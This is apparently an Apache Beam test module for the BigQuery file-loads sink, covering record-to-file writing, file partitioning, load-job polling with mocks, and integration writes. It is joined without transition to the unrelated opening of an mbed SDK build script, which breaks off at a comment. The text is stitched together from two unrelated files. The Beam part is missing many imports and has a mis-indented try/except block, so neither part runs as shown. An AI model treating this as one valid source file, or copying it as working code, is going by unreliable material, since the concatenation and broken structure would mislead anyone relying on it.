from apache_beam.io.gcp import bigquery_file_loads as bqfl
from apache_beam.io.gcp import bigquery
from apache_beam.io.gcp import bigquery_tools
from apache_beam.io.gcp.internal.clients import bigquery as bigquery_api
from apache_beam.io.gcp.tests.bigquery_matcher import BigqueryFullResultMatcher
from apache_beam.io.gcp.tests.bigquery_matcher import BigqueryFullResultStreamingMatcher
from apache_beam.runners.dataflow.test_dataflow_runner import TestDataflowRunner
from apache_beam.runners.runner import PipelineState
from apache_beam.testing.pipeline_verifiers import PipelineStateMatcher
from apache_beam.testing.test_pipeline import TestPipeline
from apache_beam.testing.test_stream import TestStream
from apache_beam.testing.util import assert_that
from apache_beam.testing.util import equal_to
from apache_beam.transforms import combiners
from apache_beam.typehints.typehints import Tuple
try:
from apitools.base.py.exceptions import HttpError
except ImportError:
raise unittest.SkipTest('GCP dependencies are not installed')
_LOGGER = logging.getLogger(__name__)
# Canned (destination table, row) pairs shared by the tests below. Rows for
# the three destinations are deliberately interleaved so the tests exercise
# per-destination grouping and ordering.
_DESTINATION_ELEMENT_PAIRS = [
    # DESTINATION 1
    ('project1:dataset1.table1', {
        'name': 'beam', 'language': 'py'
    }),
    ('project1:dataset1.table1', {
        'name': 'beam', 'language': 'java'
    }),
    ('project1:dataset1.table1', {
        'name': 'beam', 'language': 'go'
    }),
    ('project1:dataset1.table1', {
        'name': 'flink', 'language': 'java'
    }),
    ('project1:dataset1.table1', {
        'name': 'flink', 'language': 'scala'
    }),
    # DESTINATION 3
    ('project1:dataset1.table3', {
        'name': 'spark', 'language': 'scala'
    }),
    # DESTINATION 1
    ('project1:dataset1.table1', {
        'name': 'spark', 'language': 'py'
    }),
    ('project1:dataset1.table1', {
        'name': 'spark', 'language': 'scala'
    }),
    # DESTINATION 2
    ('project1:dataset1.table2', {
        'name': 'beam', 'foundation': 'apache'
    }),
    ('project1:dataset1.table2', {
        'name': 'flink', 'foundation': 'apache'
    }),
    ('project1:dataset1.table2', {
        'name': 'spark', 'foundation': 'apache'
    }),
]
# Unique destination tables and the bare rows, derived from the pairs above.
_DISTINCT_DESTINATIONS = list({elm[0] for elm in _DESTINATION_ELEMENT_PAIRS})
_ELEMENTS = [elm[1] for elm in _DESTINATION_ELEMENT_PAIRS]
# Shared schema: 'name' is required; 'language'/'foundation' are optional.
_ELEMENTS_SCHEMA = bigquery.WriteToBigQuery.get_dict_table_schema(
    bigquery_api.TableSchema(
        fields=[
            bigquery_api.TableFieldSchema(
                name="name", type="STRING", mode="REQUIRED"),
            bigquery_api.TableFieldSchema(name="language", type="STRING"),
            bigquery_api.TableFieldSchema(name="foundation", type="STRING"),
        ]))
class TestWriteRecordsToFile(_TestCaseWithTempDirCleanUp):
  """Tests for bqfl.WriteRecordsToFile.

  The DoFn under test writes (destination, row) pairs to temp files and emits
  written-file metadata on one tagged output and spilled records on another.
  """
  maxDiff = None
  def _consume_input(self, fn, checks=None):
    # Run `fn` over the canned fixture pairs and hand the tagged outputs to
    # the `checks` callback (no-op when no checks are provided).
    if checks is None:
      return
    with TestPipeline() as p:
      output_pcs = (
          p
          | beam.Create(_DESTINATION_ELEMENT_PAIRS, reshuffle=False)
          | beam.ParDo(fn, self.tmpdir).with_outputs(
              fn.WRITTEN_FILE_TAG, fn.UNWRITTEN_RECORD_TAG))
      checks(output_pcs)
      return output_pcs
  @parameterized.expand([
      param(file_format=bigquery_tools.FileFormat.AVRO),
      param(file_format=bigquery_tools.FileFormat.JSON),
      param(file_format=None),
  ])
  def test_files_created(self, file_format):
    """Test that the files are created and written."""
    fn = bqfl.WriteRecordsToFile(
        schema=_ELEMENTS_SCHEMA, file_format=file_format)
    self.tmpdir = self._new_tempdir()
    def check_files_created(output_pcs):
      # Expect one file per destination (the fixture uses 3 destinations).
      dest_file_pc = output_pcs[bqfl.WriteRecordsToFile.WRITTEN_FILE_TAG]
      files = dest_file_pc | "GetFiles" >> beam.Map(lambda x: x[1][0])
      file_count = files | "CountFiles" >> combiners.Count.Globally()
      _ = files | "FilesExist" >> beam.Map(
          lambda x: hamcrest_assert(os.path.exists(x), is_(True)))
      assert_that(file_count, equal_to([3]), label='check file count')
      destinations = (
          dest_file_pc
          | "GetDests" >>
          beam.Map(lambda x: bigquery_tools.get_hashable_destination(x[0])))
      assert_that(
          destinations,
          equal_to(list(_DISTINCT_DESTINATIONS)),
          label='check destinations ')
    self._consume_input(fn, check_files_created)
  def test_many_files(self):
    """Forces records to be written to many files.
    For each destination multiple files are necessary. This is because the max
    file length is very small, so only a couple records fit in each file.
    """
    fn = bqfl.WriteRecordsToFile(schema=_ELEMENTS_SCHEMA, max_file_size=50)
    self.tmpdir = self._new_tempdir()
    def check_many_files(output_pcs):
      dest_file_pc = output_pcs[bqfl.WriteRecordsToFile.WRITTEN_FILE_TAG]
      files_per_dest = (
          dest_file_pc
          | beam.Map(lambda x: x).with_output_types(
              beam.typehints.KV[str, Tuple[str, int]])
          | combiners.Count.PerKey())
      files_per_dest = (
          files_per_dest
          | "GetDests" >> beam.Map(
              lambda x: (bigquery_tools.get_hashable_destination(x[0]), x[1])))
      # File counts follow the per-destination row counts in the fixture.
      assert_that(
          files_per_dest,
          equal_to([('project1:dataset1.table1', 4),
                    ('project1:dataset1.table2', 2),
                    ('project1:dataset1.table3', 1)]))
      # Check that the files exist
      _ = dest_file_pc | beam.Map(lambda x: x[1][0]) | beam.Map(
          lambda x: hamcrest_assert(os.path.exists(x), is_(True)))
    self._consume_input(fn, check_many_files)
  @parameterized.expand([
      param(file_format=bigquery_tools.FileFormat.AVRO),
      param(file_format=bigquery_tools.FileFormat.JSON),
  ])
  def test_records_are_spilled(self, file_format):
    """Forces records to be written to many files.
    For each destination multiple files are necessary, and at most two files
    can be created. This forces records to be spilled to the next stage of
    processing.
    """
    fn = bqfl.WriteRecordsToFile(
        schema=_ELEMENTS_SCHEMA,
        max_files_per_bundle=2,
        file_format=file_format)
    self.tmpdir = self._new_tempdir()
    def check_many_files(output_pcs):
      dest_file_pc = output_pcs[bqfl.WriteRecordsToFile.WRITTEN_FILE_TAG]
      spilled_records_pc = output_pcs[
          bqfl.WriteRecordsToFile.UNWRITTEN_RECORD_TAG]
      spilled_records_count = (spilled_records_pc | combiners.Count.Globally())
      assert_that(spilled_records_count, equal_to([3]), label='spilled count')
      files_per_dest = (
          dest_file_pc
          | beam.Map(lambda x: x).with_output_types(
              beam.typehints.KV[str, Tuple[str, int]])
          | combiners.Count.PerKey())
      files_per_dest = (
          files_per_dest
          | "GetDests" >> beam.Map(
              lambda x: (bigquery_tools.get_hashable_destination(x[0]), x[1])))
      # Only table1 and table3 get files. table2 records get spilled.
      assert_that(
          files_per_dest,
          equal_to([('project1:dataset1.table1', 1),
                    ('project1:dataset1.table3', 1)]),
          label='file count')
      # Check that the files exist
      _ = dest_file_pc | beam.Map(lambda x: x[1][0]) | beam.Map(
          lambda x: hamcrest_assert(os.path.exists(x), is_(True)))
    self._consume_input(fn, check_many_files)
class TestWriteGroupedRecordsToFile(_TestCaseWithTempDirCleanUp):
  """Tests for bqfl.WriteGroupedRecordsToFile, which writes records that have
  already been grouped by destination."""
  def _consume_input(self, fn, input, checks):
    # Group the (destination, row) pairs, run `fn`, and hand the result
    # PCollection to the `checks` callback.
    if checks is None:
      return
    with TestPipeline() as p:
      res = (
          p
          | beam.Create(input)
          | beam.GroupByKey()
          | beam.ParDo(fn, self.tmpdir))
      checks(res)
      return res
  @parameterized.expand([
      param(file_format=bigquery_tools.FileFormat.AVRO),
      param(file_format=bigquery_tools.FileFormat.JSON),
      param(file_format=None),
  ])
  def test_files_are_created(self, file_format):
    """Test that the files are created and written."""
    fn = bqfl.WriteGroupedRecordsToFile(
        schema=_ELEMENTS_SCHEMA, file_format=file_format)
    self.tmpdir = self._new_tempdir()
    def check_files_created(output_pc):
      # Expect one file per destination (the fixture uses 3 destinations).
      files = output_pc | "GetFiles" >> beam.Map(lambda x: x[1][0])
      file_count = files | "CountFiles" >> combiners.Count.Globally()
      _ = files | "FilesExist" >> beam.Map(
          lambda x: hamcrest_assert(os.path.exists(x), is_(True)))
      assert_that(file_count, equal_to([3]), label='check file count')
      destinations = (
          output_pc
          | "GetDests" >>
          beam.Map(lambda x: bigquery_tools.get_hashable_destination(x[0])))
      assert_that(
          destinations,
          equal_to(list(_DISTINCT_DESTINATIONS)),
          label='check destinations ')
    self._consume_input(fn, _DESTINATION_ELEMENT_PAIRS, check_files_created)
  def test_multiple_files(self):
    """Forces records to be written to many files.
    For each destination multiple files are necessary. This is because the max
    file length is very small, so only a couple records fit in each file.
    """
    fn = bqfl.WriteGroupedRecordsToFile(
        schema=_ELEMENTS_SCHEMA, max_file_size=50)
    self.tmpdir = self._new_tempdir()
    def check_multiple_files(output_pc):
      files_per_dest = output_pc | combiners.Count.PerKey()
      files_per_dest = (
          files_per_dest
          | "GetDests" >> beam.Map(
              lambda x: (bigquery_tools.get_hashable_destination(x[0]), x[1])))
      # File counts follow the per-destination row counts in the fixture.
      assert_that(
          files_per_dest,
          equal_to([
              ('project1:dataset1.table1', 4),
              ('project1:dataset1.table2', 2),
              ('project1:dataset1.table3', 1),
          ]))
      # Check that the files exist
      _ = output_pc | beam.Map(lambda x: x[1][0]) | beam.Map(os.path.exists)
    self._consume_input(fn, _DESTINATION_ELEMENT_PAIRS, check_multiple_files)
class TestPartitionFiles(unittest.TestCase):
  """Tests for bqfl.PartitionFiles: batching written files into load-job
  partitions bounded by total byte size and file count."""
  # Fixture: destination0 has four 50-byte files, destination1 has two.
  _ELEMENTS = [(
      'destination0', [('file0', 50), ('file1', 50), ('file2', 50),
                       ('file3', 50)]),
               ('destination1', [('file0', 50), ('file1', 50)])]
  def test_partition(self):
    """Unit-test the Partition helper's size/count accounting."""
    partition = bqfl.PartitionFiles.Partition(1000, 1)
    self.assertEqual(partition.can_accept(50), True)
    self.assertEqual(partition.can_accept(2000), False)
    self.assertEqual(partition.can_accept(1000), True)
    partition.add('file1', 50)
    self.assertEqual(partition.files, ['file1'])
    self.assertEqual(partition.size, 50)
    # The single file slot is used up, so nothing further fits.
    self.assertEqual(partition.can_accept(50), False)
    self.assertEqual(partition.can_accept(0), False)
  def test_partition_files_dofn_file_split(self):
    """Force partitions to split based on max_files"""
    multiple_partitions_result = [('destination0', ['file0', 'file1']),
                                  ('destination0', ['file2', 'file3'])]
    single_partition_result = [('destination1', ['file0', 'file1'])]
    with TestPipeline() as p:
      destination_file_pairs = p | beam.Create(self._ELEMENTS, reshuffle=False)
      partitioned_files = (
          destination_file_pairs
          | beam.ParDo(bqfl.PartitionFiles(1000, 2)).with_outputs(
              bqfl.PartitionFiles.MULTIPLE_PARTITIONS_TAG,
              bqfl.PartitionFiles.SINGLE_PARTITION_TAG))
      multiple_partitions = partitioned_files[bqfl.PartitionFiles\
          .MULTIPLE_PARTITIONS_TAG]
      single_partition = partitioned_files[bqfl.PartitionFiles\
          .SINGLE_PARTITION_TAG]
    assert_that(
        multiple_partitions,
        equal_to(multiple_partitions_result),
        label='CheckMultiplePartitions')
    assert_that(
        single_partition,
        equal_to(single_partition_result),
        label='CheckSinglePartition')
  def test_partition_files_dofn_size_split(self):
    """Force partitions to split based on max_partition_size"""
    multiple_partitions_result = [('destination0', ['file0', 'file1', 'file2']),
                                  ('destination0', ['file3'])]
    single_partition_result = [('destination1', ['file0', 'file1'])]
    with TestPipeline() as p:
      destination_file_pairs = p | beam.Create(self._ELEMENTS, reshuffle=False)
      partitioned_files = (
          destination_file_pairs
          | beam.ParDo(bqfl.PartitionFiles(150, 10)).with_outputs(
              bqfl.PartitionFiles.MULTIPLE_PARTITIONS_TAG,
              bqfl.PartitionFiles.SINGLE_PARTITION_TAG))
      multiple_partitions = partitioned_files[bqfl.PartitionFiles\
          .MULTIPLE_PARTITIONS_TAG]
      single_partition = partitioned_files[bqfl.PartitionFiles\
          .SINGLE_PARTITION_TAG]
    assert_that(
        multiple_partitions,
        equal_to(multiple_partitions_result),
        label='CheckMultiplePartitions')
    assert_that(
        single_partition,
        equal_to(single_partition_result),
        label='CheckSinglePartition')
class TestBigQueryFileLoads(_TestCaseWithTempDirCleanUp):
  """Unit tests for the BigQueryBatchFileLoads transform.

  All BigQuery interactions are replaced by ``mock.Mock`` clients so the
  pipelines can run locally on the DirectRunner.  Temp files are created
  under a per-test directory provided by _TestCaseWithTempDirCleanUp.
  """

  def test_records_traverse_transform_with_mocks(self):
    # End-to-end run with a mocked BQ client: elements are written to temp
    # files and a single load job is issued for the one destination.
    destination = 'project1:dataset1.table1'

    job_reference = bigquery_api.JobReference()
    job_reference.projectId = 'project1'
    job_reference.jobId = 'job_name1'
    result_job = bigquery_api.Job()
    result_job.jobReference = job_reference

    # The polled job reports immediate success (state DONE, no error).
    mock_job = mock.Mock()
    mock_job.status.state = 'DONE'
    mock_job.status.errorResult = None
    mock_job.jobReference = job_reference

    bq_client = mock.Mock()
    bq_client.jobs.Get.return_value = mock_job
    bq_client.jobs.Insert.return_value = result_job

    transform = bqfl.BigQueryBatchFileLoads(
        destination,
        custom_gcs_temp_location=self._new_tempdir(),
        test_client=bq_client,
        validate=False,
        temp_file_format=bigquery_tools.FileFormat.JSON)

    # Need to test this with the DirectRunner to avoid serializing mocks
    with TestPipeline('DirectRunner') as p:
      outputs = p | beam.Create(_ELEMENTS) | transform

      dest_files = outputs[bqfl.BigQueryBatchFileLoads.DESTINATION_FILE_PAIRS]
      dest_job = outputs[bqfl.BigQueryBatchFileLoads.DESTINATION_JOBID_PAIRS]

      jobs = dest_job | "GetJobs" >> beam.Map(lambda x: x[1])

      files = dest_files | "GetFiles" >> beam.Map(lambda x: x[1][0])
      destinations = (
          dest_files
          | "GetDests" >> beam.Map(
              lambda x: (bigquery_tools.get_hashable_destination(x[0]), x[1]))
          | "GetUniques" >> combiners.Count.PerKey()
          | "GetFinalDests" >> beam.Keys())

      # All files exist
      _ = (
          files
          | beam.Map(lambda x: hamcrest_assert(os.path.exists(x), is_(True))))

      # One file per destination
      assert_that(
          files | combiners.Count.Globally(), equal_to([1]), label='CountFiles')

      assert_that(
          destinations, equal_to([destination]), label='CheckDestinations')

      assert_that(jobs, equal_to([job_reference]), label='CheckJobs')

  @unittest.skipIf(sys.version_info[0] == 2, 'Mock pickling problems in Py 2')
  @mock.patch('time.sleep')
  def test_wait_for_job_completion(self, sleep_mock):
    # WaitForBQJobs must keep polling until every job reports DONE.
    # Get.side_effect simulates two polling rounds: job 1 is still RUNNING
    # in the first round, so a second round (after one sleep) is needed.
    job_references = [bigquery_api.JobReference(), bigquery_api.JobReference()]
    job_references[0].projectId = 'project1'
    job_references[0].jobId = 'jobId1'
    job_references[1].projectId = 'project1'
    job_references[1].jobId = 'jobId2'

    job_1_waiting = mock.Mock()
    job_1_waiting.status.state = 'RUNNING'
    job_2_done = mock.Mock()
    job_2_done.status.state = 'DONE'
    job_2_done.status.errorResult = None

    job_1_done = mock.Mock()
    job_1_done.status.state = 'DONE'
    job_1_done.status.errorResult = None

    bq_client = mock.Mock()
    bq_client.jobs.Get.side_effect = [
        job_1_waiting, job_2_done, job_1_done, job_2_done
    ]

    waiting_dofn = bqfl.WaitForBQJobs(bq_client)

    dest_list = [(i, job) for i, job in enumerate(job_references)]

    with TestPipeline('DirectRunner') as p:
      references = beam.pvalue.AsList(p | 'job_ref' >> beam.Create(dest_list))
      outputs = (p | beam.Create(['']) | beam.ParDo(waiting_dofn, references))

      assert_that(outputs, equal_to(dest_list))

    # Exactly one sleep between the two polling rounds.
    sleep_mock.assert_called_once()

  @unittest.skipIf(sys.version_info[0] == 2, 'Mock pickling problems in Py 2')
  @mock.patch('time.sleep')
  def test_one_job_failed_after_waiting(self, sleep_mock):
    # Same polling setup as above, but job 1 finishes with an errorResult,
    # which must make the whole pipeline raise.
    job_references = [bigquery_api.JobReference(), bigquery_api.JobReference()]
    job_references[0].projectId = 'project1'
    job_references[0].jobId = 'jobId1'
    job_references[1].projectId = 'project1'
    job_references[1].jobId = 'jobId2'

    job_1_waiting = mock.Mock()
    job_1_waiting.status.state = 'RUNNING'
    job_2_done = mock.Mock()
    job_2_done.status.state = 'DONE'
    job_2_done.status.errorResult = None

    job_1_error = mock.Mock()
    job_1_error.status.state = 'DONE'
    job_1_error.status.errorResult = 'Some problems happened'

    bq_client = mock.Mock()
    bq_client.jobs.Get.side_effect = [
        job_1_waiting, job_2_done, job_1_error, job_2_done
    ]

    waiting_dofn = bqfl.WaitForBQJobs(bq_client)

    dest_list = [(i, job) for i, job in enumerate(job_references)]

    with self.assertRaises(Exception):
      with TestPipeline('DirectRunner') as p:
        references = beam.pvalue.AsList(p | 'job_ref' >> beam.Create(dest_list))
        _ = (p | beam.Create(['']) | beam.ParDo(waiting_dofn, references))

    sleep_mock.assert_called_once()

  def test_multiple_partition_files(self):
    # With tight max_file_size / max_partition_size / max_files_per_partition
    # limits, the input is split into several files and several load jobs,
    # followed by copy jobs into the final destination.
    destination = 'project1:dataset1.table1'

    job_reference = bigquery_api.JobReference()
    job_reference.projectId = 'project1'
    job_reference.jobId = 'job_name1'
    result_job = mock.Mock()
    result_job.jobReference = job_reference

    mock_job = mock.Mock()
    mock_job.status.state = 'DONE'
    mock_job.status.errorResult = None
    mock_job.jobReference = job_reference

    bq_client = mock.Mock()
    bq_client.jobs.Get.return_value = mock_job
    bq_client.jobs.Insert.return_value = result_job
    bq_client.tables.Delete.return_value = None

    with TestPipeline('DirectRunner') as p:
      outputs = (
          p
          | beam.Create(_ELEMENTS, reshuffle=False)
          | bqfl.BigQueryBatchFileLoads(
              destination,
              custom_gcs_temp_location=self._new_tempdir(),
              test_client=bq_client,
              validate=False,
              temp_file_format=bigquery_tools.FileFormat.JSON,
              max_file_size=45,
              max_partition_size=80,
              max_files_per_partition=2))

      dest_files = outputs[bqfl.BigQueryBatchFileLoads.DESTINATION_FILE_PAIRS]
      dest_load_jobs = outputs[
          bqfl.BigQueryBatchFileLoads.DESTINATION_JOBID_PAIRS]
      dest_copy_jobs = outputs[
          bqfl.BigQueryBatchFileLoads.DESTINATION_COPY_JOBID_PAIRS]

      load_jobs = dest_load_jobs | "GetLoadJobs" >> beam.Map(lambda x: x[1])
      copy_jobs = dest_copy_jobs | "GetCopyJobs" >> beam.Map(lambda x: x[1])

      files = dest_files | "GetFiles" >> beam.Map(lambda x: x[1][0])
      destinations = (
          dest_files
          | "GetDests" >> beam.Map(
              lambda x: (bigquery_tools.get_hashable_destination(x[0]), x[1]))
          | "GetUniques" >> combiners.Count.PerKey()
          | "GetFinalDests" >> beam.Keys())

      # All files exist
      _ = (
          files
          | beam.Map(lambda x: hamcrest_assert(os.path.exists(x), is_(True))))

      # One file per destination
      assert_that(
          files | "CountFiles" >> combiners.Count.Globally(),
          equal_to([6]),
          label='CheckFileCount')

      assert_that(
          destinations, equal_to([destination]), label='CheckDestinations')

      assert_that(
          load_jobs | "CountLoadJobs" >> combiners.Count.Globally(),
          equal_to([6]),
          label='CheckLoadJobCount')
      assert_that(
          copy_jobs | "CountCopyJobs" >> combiners.Count.Globally(),
          equal_to([6]),
          label='CheckCopyJobCount')
class BigQueryFileLoadsIT(unittest.TestCase):
  """Integration tests running FILE_LOADS writes against real BigQuery.

  A uniquely-named dataset is created in setUp and deleted (best effort)
  in tearDown; result correctness is checked with Bigquery*ResultMatcher
  verifiers attached via on_success_matcher.
  """

  # Prefix for the per-run dataset; setUp appends a timestamp and a random
  # suffix so concurrent runs do not collide.
  BIG_QUERY_DATASET_ID = 'python_bq_file_loads_'
  BIG_QUERY_SCHEMA = (
      '{"fields": [{"name": "name","type": "STRING"},'
      '{"name": "language","type": "STRING"}]}')

  BIG_QUERY_SCHEMA_2 = (
      '{"fields": [{"name": "name","type": "STRING"},'
      '{"name": "foundation","type": "STRING"}]}')

  BIG_QUERY_STREAMING_SCHEMA = ({
      'fields': [{
          'name': 'Integr', 'type': 'INTEGER', 'mode': 'NULLABLE'
      }]
  })

  def setUp(self):
    """Create a fresh dataset for this test run."""
    self.test_pipeline = TestPipeline(is_integration_test=True)
    self.runner_name = type(self.test_pipeline.runner).__name__
    self.project = self.test_pipeline.get_option('project')

    self.dataset_id = '%s%s%d' % (
        self.BIG_QUERY_DATASET_ID,
        str(int(time.time())),
        random.randint(0, 10000))
    self.bigquery_client = bigquery_tools.BigQueryWrapper()
    self.bigquery_client.get_or_create_dataset(self.project, self.dataset_id)
    self.output_table = "%s.output_table" % (self.dataset_id)
    _LOGGER.info(
        "Created dataset %s in project %s", self.dataset_id, self.project)

  @attr('IT')
  def test_multiple_destinations_transform(self):
    # Writes the same input to four tables through two WriteToBigQuery
    # transforms, exercising callable `table=` routing plus side-input
    # provided tables and schemas.
    output_table_1 = '%s%s' % (self.output_table, 1)
    output_table_2 = '%s%s' % (self.output_table, 2)
    output_table_3 = '%s%s' % (self.output_table, 3)
    output_table_4 = '%s%s' % (self.output_table, 4)
    schema1 = bigquery.WriteToBigQuery.get_dict_table_schema(
        bigquery_tools.parse_table_schema_from_json(self.BIG_QUERY_SCHEMA))
    schema2 = bigquery.WriteToBigQuery.get_dict_table_schema(
        bigquery_tools.parse_table_schema_from_json(self.BIG_QUERY_SCHEMA_2))

    schema_kv_pairs = [(output_table_1, schema1), (output_table_2, schema2),
                       (output_table_3, schema1), (output_table_4, schema2)]
    # Rows with a 'language' field go to tables 1/3; rows with 'foundation'
    # go to tables 2/4.  Verify all four tables after the run.
    pipeline_verifiers = [
        BigqueryFullResultMatcher(
            project=self.project,
            query="SELECT name, language FROM %s" % output_table_1,
            data=[(d['name'], d['language']) for d in _ELEMENTS
                  if 'language' in d]),
        BigqueryFullResultMatcher(
            project=self.project,
            query="SELECT name, foundation FROM %s" % output_table_2,
            data=[(d['name'], d['foundation']) for d in _ELEMENTS
                  if 'foundation' in d]),
        BigqueryFullResultMatcher(
            project=self.project,
            query="SELECT name, language FROM %s" % output_table_3,
            data=[(d['name'], d['language']) for d in _ELEMENTS
                  if 'language' in d]),
        BigqueryFullResultMatcher(
            project=self.project,
            query="SELECT name, foundation FROM %s" % output_table_4,
            data=[(d['name'], d['foundation']) for d in _ELEMENTS
                  if 'foundation' in d])
    ]

    args = self.test_pipeline.get_full_options_as_args(
        on_success_matcher=all_of(*pipeline_verifiers),
        experiments='use_beam_bq_sink')

    with beam.Pipeline(argv=args) as p:
      input = p | beam.Create(_ELEMENTS, reshuffle=False)

      schema_map_pcv = beam.pvalue.AsDict(
          p | "MakeSchemas" >> beam.Create(schema_kv_pairs))

      table_record_pcv = beam.pvalue.AsDict(
          p | "MakeTables" >> beam.Create([('table1', output_table_1),
                                           ('table2', output_table_2)]))

      # Get all input in same machine
      input = (
          input
          | beam.Map(lambda x: (None, x))
          | beam.GroupByKey()
          | beam.FlatMap(lambda elm: elm[1]))

      # Destination table and schema both come from side inputs.
      _ = (
          input | "WriteWithMultipleDestsFreely" >> bigquery.WriteToBigQuery(
              table=lambda x, tables: (
                  tables['table1'] if 'language' in x else tables['table2']),
              table_side_inputs=(table_record_pcv, ),
              schema=lambda dest, schema_map: schema_map.get(dest, None),
              schema_side_inputs=(schema_map_pcv, ),
              create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,
              write_disposition=beam.io.BigQueryDisposition.WRITE_EMPTY))

      # Destination comes from a plain callable; small max_file_size and
      # unlimited files-per-bundle force multiple temp files.
      _ = (
          input | "WriteWithMultipleDests" >> bigquery.WriteToBigQuery(
              table=lambda x: (
                  output_table_3 if 'language' in x else output_table_4),
              schema=lambda dest, schema_map: schema_map.get(dest, None),
              schema_side_inputs=(schema_map_pcv, ),
              create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED,
              write_disposition=beam.io.BigQueryDisposition.WRITE_EMPTY,
              max_file_size=20,
              max_files_per_bundle=-1))

  @attr('IT')
  def test_bqfl_streaming(self):
    # FILE_LOADS in a streaming pipeline, driven by a TestStream.
    if isinstance(self.test_pipeline.runner, TestDataflowRunner):
      self.skipTest("TestStream is not supported on TestDataflowRunner")
    output_table = '%s_%s' % (self.output_table, 'ints')
    _SIZE = 100
    schema = self.BIG_QUERY_STREAMING_SCHEMA
    l = [{'Integr': i} for i in range(_SIZE)]

    # The pipeline should stay RUNNING (it is streaming) while the table
    # eventually contains all _SIZE integers.
    state_matcher = PipelineStateMatcher(PipelineState.RUNNING)
    bq_matcher = BigqueryFullResultStreamingMatcher(
        project=self.project,
        query="SELECT Integr FROM %s" % output_table,
        data=[(i, ) for i in range(100)])

    args = self.test_pipeline.get_full_options_as_args(
        on_success_matcher=all_of(state_matcher, bq_matcher),
        experiments='use_beam_bq_sink',
        streaming=True)
    with beam.Pipeline(argv=args) as p:
      # Emit the elements in four quarters, advancing processing time and
      # the watermark between batches so triggering_frequency fires.
      stream_source = (
          TestStream().advance_watermark_to(0).advance_processing_time(
              100).add_elements(l[:_SIZE // 4]).
          advance_processing_time(100).advance_watermark_to(100).add_elements(
              l[_SIZE // 4:2 * _SIZE // 4]).advance_processing_time(
                  100).advance_watermark_to(200).add_elements(
                      l[2 * _SIZE // 4:3 * _SIZE // 4]).advance_processing_time(
                          100).advance_watermark_to(300).add_elements(
                              l[3 * _SIZE // 4:]).advance_processing_time(
                                  100).advance_watermark_to_infinity())
      _ = (p
           | stream_source
           | bigquery.WriteToBigQuery(output_table,
                                      schema=schema,
                                      method=bigquery.WriteToBigQuery \
                                          .Method.FILE_LOADS,
                                      triggering_frequency=100))

  @attr('IT')
  def test_one_job_fails_all_jobs_fail(self):
    # If one of the import jobs fails, then other jobs must not be performed.
    # This is to avoid reinsertion of some records when a pipeline fails and
    # is rerun.
    output_table_1 = '%s%s' % (self.output_table, 1)
    output_table_2 = '%s%s' % (self.output_table, 2)

    self.bigquery_client.get_or_create_table(
        self.project,
        self.dataset_id,
        output_table_1.split('.')[1],
        bigquery_tools.parse_table_schema_from_json(self.BIG_QUERY_SCHEMA),
        None,
        None)
    self.bigquery_client.get_or_create_table(
        self.project,
        self.dataset_id,
        output_table_2.split('.')[1],
        bigquery_tools.parse_table_schema_from_json(self.BIG_QUERY_SCHEMA_2),
        None,
        None)

    # Both tables must remain empty after the failed run.
    pipeline_verifiers = [
        BigqueryFullResultMatcher(
            project=self.project,
            query="SELECT name, language FROM %s" % output_table_1,
            data=[]),
        BigqueryFullResultMatcher(
            project=self.project,
            query="SELECT name, foundation FROM %s" % output_table_2,
            data=[])
    ]

    args = self.test_pipeline.get_full_options_as_args(
        experiments='use_beam_bq_sink')

    with self.assertRaises(Exception):
      # The pipeline below fails because neither a schema nor SCHEMA_AUTODETECT
      # are specified.
      with beam.Pipeline(argv=args) as p:
        input = p | beam.Create(_ELEMENTS)
        input2 = p | "Broken record" >> beam.Create(['language_broken_record'])

        input = (input, input2) | beam.Flatten()

        _ = (
            input | "WriteWithMultipleDests" >> bigquery.WriteToBigQuery(
                table=lambda x: (
                    output_table_1 if 'language' in x else output_table_2),
                create_disposition=(
                    beam.io.BigQueryDisposition.CREATE_IF_NEEDED),
                write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND,
                temp_file_format=bigquery_tools.FileFormat.JSON))

    hamcrest_assert(p, all_of(*pipeline_verifiers))

  def tearDown(self):
    """Delete the dataset created in setUp (best effort)."""
    request = bigquery_api.BigqueryDatasetsDeleteRequest(
        projectId=self.project, datasetId=self.dataset_id, deleteContents=True)
    try:
      _LOGGER.info(
          "Deleting dataset %s in project %s", self.dataset_id, self.project)
      self.bigquery_client.client.datasets.Delete(request)
    except HttpError:
      # Cleanup failure should not fail the test run itself.
      _LOGGER.debug(
          'Failed to clean up dataset %s in project %s',
          self.dataset_id,
          self.project)
if __name__ == '__main__':
  # Run the suite directly; INFO logging makes pipeline progress visible.
  logging.getLogger().setLevel(logging.INFO)
  unittest.main()
| |
"""
mbed SDK
Copyright (c) 2011-2013 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import re
import tempfile
import colorama
from types import ListType
from shutil import rmtree
from os.path import join, exists, basename
from workspace_tools.utils import mkdir, run_cmd, run_cmd_ext
from workspace_tools.paths import MBED_TARGETS_PATH, MBED_LIBRARIES, MBED_API, MBED_HAL, MBED_COMMON
from workspace_tools.targets import TARGET_NAMES, TARGET_MAP
from workspace_tools.libraries import Library
from workspace_tools.toolchains import TOOLCHAIN_CLASSES
from jinja2 import FileSystemLoader
from jinja2.environment import Environment
def build_project(src_path, build_path, target, toolchain_name,
        libraries_paths=None, options=None, linker_script=None,
        clean=False, notify=None, verbose=False, name=None, macros=None, inc_dirs=None, jobs=1, silent=False):
    """ This function builds project. Project can be for example one test / UT

    src_path: source path (string) or list of source paths; the first entry
        names the project
    build_path: output directory for objects and the linked binary
    libraries_paths: optional list of prebuilt/extra library paths which are
        also compiled and linked in
    linker_script: optional explicit linker script for the link step
    clean: wipe build_path and rebuild everything when True
    name: custom project name; defaults to the first source folder's name
    inc_dirs: additional include directory (string) or directories (list)
    Returns the result of toolchain.link_program (the built program path).
    """
    # Toolchain instance
    toolchain = TOOLCHAIN_CLASSES[toolchain_name](target, options, notify, macros, silent)
    toolchain.VERBOSE = verbose
    toolchain.jobs = jobs
    toolchain.build_all = clean
    src_paths = [src_path] if type(src_path) != ListType else src_path

    # We need to remove all paths which are repeated to avoid
    # multiple compilations and linking with the same objects.
    # BUGFIX: the old '[src_paths[0]] + list(set(src_paths[1:]))' could keep
    # a duplicate of the first path and scrambled the order of the rest;
    # dedupe while preserving order instead.
